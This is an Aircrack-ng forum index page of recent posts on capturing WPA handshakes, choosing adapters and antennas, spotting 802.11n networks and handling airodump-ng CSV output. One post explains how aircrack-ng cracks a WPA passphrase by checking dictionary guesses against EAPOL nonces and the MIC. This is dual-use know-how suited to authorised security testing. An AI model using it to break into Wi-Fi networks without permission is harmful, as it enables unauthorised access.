Aircrack-ng

Please login or register.

Login with username, password and session length
Pages: 1 [2] 3 4 ... 10
 11 
 on: June 05, 2018, 12:04:53 PM 
Started by nomonater - Last post by misterx
Then you'll have to write your own program to output the fields you need.

 12 
 on: June 05, 2018, 03:22:33 AM 
Started by peterfarge - Last post by mstrmnn
So Aircrack needs only Eapol-1 (or Eapol-3) and Eapol-2.
Thanks for your explanation. I enjoyed reading!

 13 
 on: June 05, 2018, 01:51:11 AM 
Started by newb.hacker - Last post by newb.hacker
Thx for the reply. Is there any way to confirm that the devices connected are on 802.11n/ac? And also what is the meaning of AP(Access point). I tried googling it but was unsuccessful. Pardon my offenses because i am a beginner.

 14 
 on: June 04, 2018, 07:48:50 PM 
Started by peterfarge - Last post by misterx
If you have aircrack-ng 1.2, it should be pretty obvious with rates that are different from b/g rates 1,2,5.5,11, 24, 36,48,54.

802.11b would be 1,2,5.5,11 and 802.11g also supports 24, 36,48,54.

 15 
 on: June 04, 2018, 07:46:37 PM 
Started by peterfarge - Last post by misterx
Beacon is not needed, you would just have to provide essid when cracking. It is just more convenient.

 16 
 on: June 04, 2018, 07:06:13 PM 
Started by peterfarge - Last post by peterfarge
This page (aircrack-ng) says I need Eapol packet 2+3 or 3+4 to do an attack.
This page (wpa_capture) says I need 1+2 or 3+4. (Packets with the same “replay counter” value are matching sets)

To calculate the PTK (Pairwise Transient Keys), I need:
1. A-Nounce: Random number from the AP, is delivered in plain text within Packet Eapol-1 and Eapol-3.
2. S-Nounce: Random number from the Client, is delivered in plain text within Packet Eapol-2.
3. Mac Addresses of both client and AP. Its in every Eapol packet.
4. And the passphrase. (Pre shared key case)

Aircrack takes a passphrase from the password-dictionary and calculates a PTK candidate. Then with the PTK candidate, Aircrack calculates the Message Integrity Code (MIC) and compares it with the real Mic in Eapol-2. If they match, the correct passphrase is found.

So Aircrack needs only Eapol-1 (or Eapol-3) and Eapol-2. All needed infos are in there. If I remove all packets from the .cap file except the combination (1+2 or 2+3), aircrack seems to work. Only I have to give the SSID as an extra parameter to the command line, I dont know where it is used in the cracking process. The Eapol 4-Way Handshake does not need the SSID, if the explanations are right.

The combination Eapol 3+4 does not work, I have checked it with aircrack.

And what means: Ensure this beacon is part of the same packet sequence numbers (Source: wpa_capture). The beacon contains no important info. The sequence numbers consists of 12 bits, which means a reset every 4096 packets. If only the first beacon is inserted into the cap file, the captured handshake could happen thousands resets later.

I think in the manual are some infos about cracking the passphrase mixed with injection into the packet stream.

 17 
 on: June 04, 2018, 03:55:11 PM 
Started by peterfarge - Last post by peterfarge
I have updated my OpenWRT router from Barrier Breaker to Chaos Calmer. Instead of Band I have a Combobox labeled Mode. I can switch between N and legacy. I'm guessing that legacy means 802.11 b/g/a, because then a bandwidth of 40MHz isnt possible anymore. So now its the other way around: I needed 6 tries switching wlan on/off to catch the handshake with the inbuild intel adapter, but the Alfa Awus036h catches the complete handshake on every second try. But the data packets problem stays: If I start airodump in the same second and open a webpage in my smartphone, the alfa catches 376 data packets (306 beacons) and the inbuild intel card catches 1044 data packets (434 beacons).

Because of the data rate (MB column), I can see if its a 802.11b or 802.11g network, but how can I see that its a 802.11n network? I can find any info in iwlist wlan1 scan either. How can I recognize a 802.11n network?

 18 
 on: June 04, 2018, 03:40:06 PM 
Started by nomonater - Last post by nomonater
I assume you want to use the database feature to automatically import the CSV. It will not work because this CSV is a bit special. It has 2 parts: the APs at the beginning and the clients afterward and both of those have different set of columns. I would suggest creating a custom script to import it considering you also can't choose which columns are exported in the CSV.
That is why I asked this question.  So there is no way to format the output CSV file from airodump-ng to only contain the clients and simply not save the access points.  The reason why I need this to be the case is that I am running out of threads to use and a python script or something running to create another file with only the client data is gonna really slow the system down and I may flat out not have enough threads to do this not to mention the more space this uses on the sd card and the delay that info will be entering the database.

 19 
 on: June 04, 2018, 03:26:30 PM 
Started by domelsnake - Last post by misterx
1. Yes. Just FYI, we have a repository and I believe Kali is using it
2. It is working but just bear in mind that it is still in development, beta pretty much, so depending on your "injection/capture" requirements, it might work.
3. Don't put directional antenna on that card unless the antenna is designed for MIMO. Regarding omni, there isn't much point going over 5-7dbi gain due to the radiation pattern.

NH is probably a better choice for now. Keep the ACH for experimenting as explained in 2.

 20 
 on: June 04, 2018, 03:22:16 PM 
Started by nomonater - Last post by misterx
I assume you want to use the database feature to automatically import the CSV. It will not work because this CSV is a bit special. It has 2 parts: the APs at the beginning and the clients afterward and both of those have different set of columns. I would suggest creating a custom script to import it considering you also can't choose which columns are exported in the CSV.

Pages: 1 [2] 3 4 ... 10